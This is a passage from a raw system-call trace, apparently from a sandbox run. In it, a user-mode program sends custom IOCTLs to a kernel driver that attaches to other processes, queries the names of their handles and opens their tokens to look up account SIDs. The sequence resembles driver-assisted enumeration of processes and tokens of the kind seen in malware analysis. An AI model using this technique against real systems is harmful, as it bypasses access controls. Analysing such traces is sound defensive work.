Object=0xfffff8a001c4e8c0, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.468] ObfDereferenceObject (Object=0xfffff8a001c4e8c0) returned 0x2 [0246.468] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.468] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.468] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.468] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0246.468] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.468] PsAcquireProcessExitSynchronization () returned 0x0 [0246.468] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0) [0246.468] ObReferenceObjectByHandle (in: Handle=0x360, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00176cc30, HandleInformation=0x0) returned 0x0 [0246.468] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.468] PsReleaseProcessExitSynchronization () returned 0x2 [0246.468] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0246.468] ObQueryNameString (in: Object=0xfffff8a00176cc30, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.468] ObfDereferenceObject (Object=0xfffff8a00176cc30) returned 0x2 [0246.468] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.468] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.468] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.468] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0246.468] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.468] PsAcquireProcessExitSynchronization () returned 0x0 [0246.468] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0) [0246.468] ObReferenceObjectByHandle (in: Handle=0x368, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001759700, HandleInformation=0x0) returned 0x0 [0246.469] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.469] PsReleaseProcessExitSynchronization () returned 0x2 [0246.469] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0246.469] ObQueryNameString (in: Object=0xfffff8a001759700, ObjectNameInfo=0xfffffa800310e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.469] ObfDereferenceObject (Object=0xfffff8a001759700) returned 0x2 [0246.469] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.469] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.469] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.469] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0246.469] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.469] PsAcquireProcessExitSynchronization () returned 0x0 [0246.469] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0) [0246.469] ObReferenceObjectByHandle (in: Handle=0x370, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80028573a0, HandleInformation=0x0) returned 0x0 [0246.469] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.469] PsReleaseProcessExitSynchronization () returned 0x2 [0246.469] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0246.469] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.469] ObfDereferenceObject (Object=0xfffffa80028573a0) returned 0x5 [0246.469] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.469] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.470] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.470] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x90, lpOverlapped=0x0) returned 1 [0246.470] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.470] PsAcquireProcessExitSynchronization () returned 0x0 [0246.470] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0) [0246.470] ObReferenceObjectByHandle (in: Handle=0x380, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001b855f0, HandleInformation=0x0) returned 0x0 [0246.470] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.470] PsReleaseProcessExitSynchronization () returned 0x2 [0246.470] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0246.470] ObQueryNameString (in: Object=0xfffff8a001b855f0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.470] ObfDereferenceObject (Object=0xfffff8a001b855f0) returned 0x2 [0246.470] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.470] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.470] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.470] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0246.470] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.470] PsAcquireProcessExitSynchronization () returned 0x0 [0246.470] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0) [0246.470] ObReferenceObjectByHandle (in: Handle=0x384, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001bdbf30, HandleInformation=0x0) returned 0x0 [0246.470] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.470] PsReleaseProcessExitSynchronization () returned 0x2 [0246.470] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0246.471] ObQueryNameString (in: Object=0xfffff8a001bdbf30, ObjectNameInfo=0xfffffa80030c5044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030c5044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.471] ObfDereferenceObject (Object=0xfffff8a001bdbf30) returned 0x2 [0246.471] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.471] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.471] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.471] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0246.471] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.471] PsAcquireProcessExitSynchronization () returned 0x0 [0246.471] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff880053c85d0) [0246.471] ObReferenceObjectByHandle (in: Handle=0x38c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001bb5080, HandleInformation=0x0) returned 0x0 [0246.471] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.471] PsReleaseProcessExitSynchronization () returned 0x2 [0246.471] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0246.471] ObQueryNameString (in: Object=0xfffff8a001bb5080, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.471] ObfDereferenceObject (Object=0xfffff8a001bb5080) returned 0x2 [0246.471] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.471] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.471] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa7c) returned 0xc8 [0246.471] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.471] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80020f7390, HandleInformation=0x0) returned 0x0 [0246.471] ObOpenObjectByPointer (in: Object=0xfffffa80020f7390, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.472] ObfDereferenceObject (Object=0xfffffa80020f7390) returned 0x3d [0246.472] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002fec1c0 | out: TokenHandle=0xfffffa8002fec1c0*=0xc4) returned 0x0 [0246.472] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.472] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.472] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.472] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.573] CloseHandle (hObject=0xc4) returned 1 [0246.573] CloseHandle (hObject=0xc8) returned 1 [0246.573] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.573] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.573] PsLookupProcessByProcessId (in: ProcessId=0xa7c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.573] PsAcquireProcessExitSynchronization () returned 0x0 [0246.573] KeStackAttachProcess (in: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880053c85d0) [0246.573] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ee3070, HandleInformation=0x0) returned 0x0 [0246.573] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.573] PsReleaseProcessExitSynchronization () returned 0x2 [0246.573] ObfDereferenceObject (Object=0xfffffa80020f7390) returned 0x3b [0246.573] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.573] ObfDereferenceObject (Object=0xfffffa8001ee3070) returned 0x1 [0246.573] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.574] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.574] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.574] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0246.574] PsLookupProcessByProcessId (in: ProcessId=0xa7c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.574] PsAcquireProcessExitSynchronization () returned 0x0 [0246.574] KeStackAttachProcess (in: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880053c85d0) [0246.574] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001fe7380, HandleInformation=0x0) returned 0x0 [0246.574] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.574] PsReleaseProcessExitSynchronization () returned 0x2 [0246.574] ObfDereferenceObject (Object=0xfffffa80020f7390) returned 0x3b [0246.574] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.574] ObfDereferenceObject (Object=0xfffffa8001fe7380) returned 0x1 [0246.574] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.574] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.574] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.574] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0246.574] PsLookupProcessByProcessId (in: ProcessId=0xa7c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.574] PsAcquireProcessExitSynchronization () returned 0x0 [0246.574] KeStackAttachProcess (in: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880053c85d0) [0246.575] ObReferenceObjectByHandle (in: Handle=0xec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0246.575] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.575] PsReleaseProcessExitSynchronization () returned 0x2 [0246.575] ObfDereferenceObject (Object=0xfffffa80020f7390) returned 0x3b [0246.575] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.575] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0xa [0246.575] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.575] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.575] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.575] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0246.575] PsLookupProcessByProcessId (in: ProcessId=0xa7c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.575] PsAcquireProcessExitSynchronization () returned 0x0 [0246.575] KeStackAttachProcess (in: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880053c85d0) [0246.575] ObReferenceObjectByHandle (in: Handle=0x114, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ea7620, HandleInformation=0x0) returned 0x0 [0246.575] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.575] PsReleaseProcessExitSynchronization () returned 0x2 [0246.575] ObfDereferenceObject (Object=0xfffffa80020f7390) returned 0x3b [0246.575] ObQueryNameString (in: Object=0xfffffa8001ea7620, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.575] ObfDereferenceObject (Object=0xfffffa8001ea7620) returned 0x1 [0246.575] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.575] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.575] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.575] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0246.575] PsLookupProcessByProcessId (in: ProcessId=0xa7c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.576] PsAcquireProcessExitSynchronization () returned 0x0 [0246.576] KeStackAttachProcess (in: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880053c85d0) [0246.576] ObReferenceObjectByHandle (in: Handle=0x174, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001e80e80, HandleInformation=0x0) returned 0x0 [0246.576] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.576] PsReleaseProcessExitSynchronization () returned 0x2 [0246.576] ObfDereferenceObject (Object=0xfffffa80020f7390) returned 0x3b [0246.576] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.576] ObfDereferenceObject (Object=0xfffffa8001e80e80) returned 0x1 [0246.576] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.576] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.576] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.576] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0246.576] PsLookupProcessByProcessId (in: ProcessId=0xa7c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.576] PsAcquireProcessExitSynchronization () returned 0x0 [0246.576] KeStackAttachProcess (in: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880053c85d0) [0246.576] ObReferenceObjectByHandle (in: Handle=0x1b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001febe60, HandleInformation=0x0) returned 0x0 [0246.576] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.576] PsReleaseProcessExitSynchronization () returned 0x2 [0246.576] ObfDereferenceObject (Object=0xfffffa80020f7390) returned 0x3b [0246.576] ObQueryNameString (in: Object=0xfffffa8001febe60, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.576] ObfDereferenceObject (Object=0xfffffa8001febe60) returned 0x10 [0246.576] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.577] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.577] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.577] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0246.577] PsLookupProcessByProcessId (in: ProcessId=0xa7c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.577] PsAcquireProcessExitSynchronization () returned 0x0 [0246.577] KeStackAttachProcess (in: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020f7390, ApcState=0xfffff880053c85d0) [0246.577] ObReferenceObjectByHandle (in: Handle=0x1f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0x0, HandleInformation=0x0) returned 0xc0000008 [0246.577] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.577] PsReleaseProcessExitSynchronization () returned 0x2 [0246.577] ObfDereferenceObject (Object=0xfffffa80020f7390) returned 0x3b [0246.577] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.577] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.577] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa4c) returned 0xc8 [0246.577] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.577] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa800202c060, HandleInformation=0x0) returned 0x0 [0246.577] ObOpenObjectByPointer (in: Object=0xfffffa800202c060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.577] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x20 [0246.577] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8003ab1940 | out: TokenHandle=0xfffffa8003ab1940*=0xc4) returned 0x0 [0246.577] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.577] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.577] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 